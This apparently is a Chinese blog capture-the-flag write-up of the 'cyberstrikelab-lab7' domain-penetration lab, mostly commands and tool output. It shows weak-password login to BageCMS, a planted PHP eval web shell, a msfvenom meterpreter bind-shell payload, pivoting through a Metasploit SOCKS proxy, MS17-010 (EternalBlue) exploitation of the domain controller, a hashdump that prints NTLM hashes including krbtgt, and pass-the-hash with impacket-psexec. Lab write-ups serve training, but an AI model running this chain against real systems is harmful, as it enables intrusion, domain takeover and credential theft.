搜索到
1
篇与
的结果
-
【域渗透】cyberstrikelab-lab7 cyberstrikelab-lab7web渗透9652端口八哥CMSPS C:\Users\xt350> fscan.exe -h 192.168.10.10 -p 1-65000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan 192.168.10.10:139 open 192.168.10.10:135 open 192.168.10.10:445 open 192.168.10.10:3306 open 192.168.10.10:5040 open 192.168.10.10:7680 open 192.168.10.10:9652 open 192.168.10.10:49664 open 192.168.10.10:49666 open 192.168.10.10:49665 open 192.168.10.10:49669 open 192.168.10.10:49668 open 192.168.10.10:49667 open 192.168.10.10:49670 open [*] alive ports len is: 14 start vulscan [*] WebTitle http://192.168.10.10:9652 code:200 len:14625 title:网站标题-网站标题 - Powered By BageCMS 已完成 14/14 [*] 扫描结束,耗时: 4m16.0065058s http://192.168.10.10:9652/install.txt这个地址泄露了后台管理地址,使用admin / admin123456弱口令登录后台,发现cms版本为 BageCMS3.1.0修改网站首页源码<?php @eval($_POST['a']);?> 生成msf马,执行,监听上线msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z" 内网渗透C:\phpstudy_pro\WWW>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::8c17:fbcc:901f:c897%6 IPv4 Address. . . . . . . . . . . : 192.168.10.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Ethernet adapter ��̫��ʵ�� 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::fd48:8021:9701:9c1d%14 IPv4 Address. . . . . . . . . . . : 192.168.20.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.20.1 C:\phpstudy_pro\WWW>fscan.exe -h 192.168.20.10/24 fscan.exe -h 192.168.20.10/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.10 is alive (icmp) Target 192.168.20.20 is alive (icmp) Target 192.168.20.40 is alive [*] Icmp alive hosts len is: 3 192.168.20.20:445 open 192.168.20.10:445 open 192.168.20.10:7680 open 192.168.20.40:88 open 192.168.20.20:3306 open 192.168.20.10:3306 open 192.168.20.40:445 open 192.168.20.40:139 open 192.168.20.20:139 open 192.168.20.10:139 open 192.168.20.40:135 open 192.168.20.20:135 open 192.168.20.10:135 open [*] alive ports len is: 13 start vulscan [+] NetInfo: [*]192.168.20.40 [->]WIN-137FCI4D99A [->]192.168.20.40 [+] NetInfo: [*]192.168.20.20 [->]cyberweb [->]192.168.20.20 [+] 192.168.20.40 MS17-010 (Windows Server 2016 Standard 14393) [*] 192.168.20.40 [+]DC CYBERSTRIKELAB\WIN-137FCI4D99A Windows Server 2016 Standard 14393 [*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600 已完成 13/13 [*] 扫描结束,耗时: 14.733617s 域控主机为20.40,存在永恒之蓝漏洞,使用msf命令执行,获取第二个flaguse admin/smb/ms17_010_command set command type c:\\flag.txt set rhosts 192.168.20.40 run 配置路由run post/multi/manage/autoroute 使用代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j 本机使用proxifier代理到kali msf的ip地址和端口开启本地资源共享远程连接传入msf正向马msf设置好配置,准备上线利用永恒之蓝执行木马(我们远程登录的是普通用户,不是系统权限,抓取不了hash),需要利用永恒之蓝来执行木马msf auxiliary(admin/smb/ms17_010_command) > set command C:\\Users\\xiaoyu\\Desktop\\shell.exe command => C:\Users\xiaoyu\Desktop\shell.exe msf auxiliary(admin/smb/ms17_010_command) > run [*] 192.168.20.40:445 - Target OS: Windows Server 2016 Standard 14393 [*] 192.168.20.40:445 - Built a write-what-where primitive... [+] 192.168.20.40:445 - Overwrite complete... SYSTEM session obtained! [+] 192.168.20.40:445 - Service start timed out, OK if running a command or non-service executable... [*] 192.168.20.40:445 - Getting the command output... [*] 192.168.20.40:445 - Command finished with no output [*] 192.168.20.40:445 - Executing cleanup... [+] 192.168.20.40:445 - Cleanup was successful [+] 192.168.20.40:445 - Command completed successfully! [*] 192.168.20.40:445 - Output for "C:\Users\xiaoyu\Desktop\shell.exe": [*] 192.168.20.40:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 因为使用的是正向连接,执行之后再来连接shellmsf auxiliary(admin/smb/ms17_010_command) > use exploit/multi/handler [*] Using configured payload windows/meterpreter/bind_tcp msf exploit(multi/handler) > show options Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 4444 yes The listen port RHOST 192.168.20.40 no The target address Exploit target: Id Name -- ---- 0 Wildcard Target View the full module info with the info, or info -d command. msf exploit(multi/handler) > run -j [*] Exploit running as background job 5. [*] Exploit completed, but no session was created. [*] Started bind TCP handler against 192.168.20.40:4444 msf exploit(multi/handler) > [*] Sending stage (177734 bytes) to 192.168.20.40 [*] Meterpreter session 4 opened (192.168.20.10:50929 -> 192.168.20.40:4444 via session 3) at 2025-12-11 02:21:05 -0500 msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ DESKTOP-JFB 10.10.10.173:36245 -> 192.168.10.1 57A8 0:4444 (192.168.10.10) 4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN-137FCI4 192.168.20.10:50929 -> 192.168.20. D99A 40:4444 via session 3 (192.168.20. 40) msf exploit(multi/handler) > sessions 4 [*] Starting interaction with 4... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 利用msf的hashdump,获取域控主机的管理员hashmeterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8174fc8c5ee7a8e460df2e61d00bd3c::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f230bc7afd28cc6d52aab59e6e31fd6a::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: cyberweb:1106:aad3b435b51404eeaad3b435b51404ee:214352b7762ea8894f78edcbf5748a05::: xiaoyu:1107:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd::: WIN-137FCI4D99A$:1000:aad3b435b51404eeaad3b435b51404ee:44ec20bd68d4e22d3428a97d15f441dd::: CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:664117f18ce890f00499a80e2fb92904::: PTH 20,拿下最后一台机器proxychains impacket-psexec -hashes :d8174fc8c5ee7a8e460df2e61d00bd3c cyberstrikelab.com/Administrator@192.168.20.20
